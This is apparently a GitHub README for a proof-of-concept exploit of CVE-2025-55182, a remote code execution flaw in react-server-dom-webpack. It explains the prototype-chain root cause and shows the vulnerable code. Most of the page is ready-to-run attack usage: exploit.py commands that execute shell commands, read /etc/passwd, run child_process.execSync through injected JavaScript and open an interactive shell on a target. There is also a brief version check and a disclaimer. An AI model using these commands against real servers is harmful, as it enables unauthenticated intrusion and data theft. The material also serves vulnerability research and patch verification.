Skip to content

carlosaruy/CVE-2025-55182-poc

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 

Repository files navigation

CVE-2025-55182 Proof of Concept

Critical Pre-Authentication Remote Code Execution in React Server Components

A complete proof-of-concept demonstrating CVE-2025-55182, a critical vulnerability in react-server-dom-webpack@19.0.0 that allows unauthenticated attackers to execute arbitrary code via prototype chain pollution.

Security Research Python 3.8+ License: MIT

🎯 Quick Start

# Clone the repository
git clone https://github.com/whiteov3rflow/CVE-2025-55182-poc
cd CVE-2025-55182-poc

# Exploit the server
python3 exploit.py --url http://localhost:3002 --cmd "whoami"

🔥 Vulnerability Details

CVE ID: CVE-2025-55182
Affected Package: react-server-dom-webpack@19.0.0
Severity: Critical (Pre-auth RCE)
CVSS: 10.0

Root Cause

The requireModule function uses bracket notation (moduleExports[metadata[2]]) without checking hasOwnProperty, allowing prototype chain traversal to access dangerous Node.js built-in modules like vm, child_process, and fs.

// Vulnerable code in react-server-dom-webpack
function requireModule(metadata) {
  var moduleExports = __webpack_require__(metadata[0]);
  return moduleExports[metadata[2]];  // ❌ No hasOwnProperty check!
}

Usage

Execute commands:

python3 exploit.py --url http://localhost:3002 --cmd "whoami"
python3 exploit.py --url http://localhost:3002 --cmd "cat /etc/passwd"

Read files:

python3 exploit.py --url http://localhost:3002 --read /etc/hostname

Execute JavaScript:

python3 exploit.py --url http://localhost:3002 --js "Math.sqrt(144)"

Interactive shell:

python3 exploit.py --url http://localhost:3002 --shell

Run vulnerability test:

python3 exploit.py --url http://localhost:3002 --test

Quiet mode (for scripting):

python3 exploit.py --url http://localhost:3002 --cmd "id" --quiet

🎭 Exploitation Methods

Method 1: vm.runInThisContext (Most Powerful)

python3 exploit.py --url http://target:3000 --js "process.mainModule.require('child_process').execSync('whoami').toString()"

Method 2: child_process.execSync (Direct)

python3 exploit.py --url http://target:3000 --cmd "whoami" --method child_process

Method 3: fs.readFileSync (File Access)

python3 exploit.py --url http://target:3000 --read /etc/passwd --method fs

🔍 Testing Your Application

Check if your app is vulnerable:

./check-vulnerability.sh

Or manually:

grep "react-server-dom-webpack" package.json
npm list react-server-dom-webpack

Vulnerable versions:

  • react-server-dom-webpack@19.0.0
  • react-server-dom-webpack@19.0.0-rc-*

Fixed versions:

  • react-server-dom-webpack@19.1.0+

🧪 Example Output

image

⚠️ Disclaimer

This POC is provided for educational and security research purposes only. Only test against systems you own or have explicit permission to test. Unauthorized access to computer systems is illegal.

📚 References


Made with 💀 for security research

About

React2Shell Proof of Concept

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages

  • Python 81.4%
  • Shell 18.6%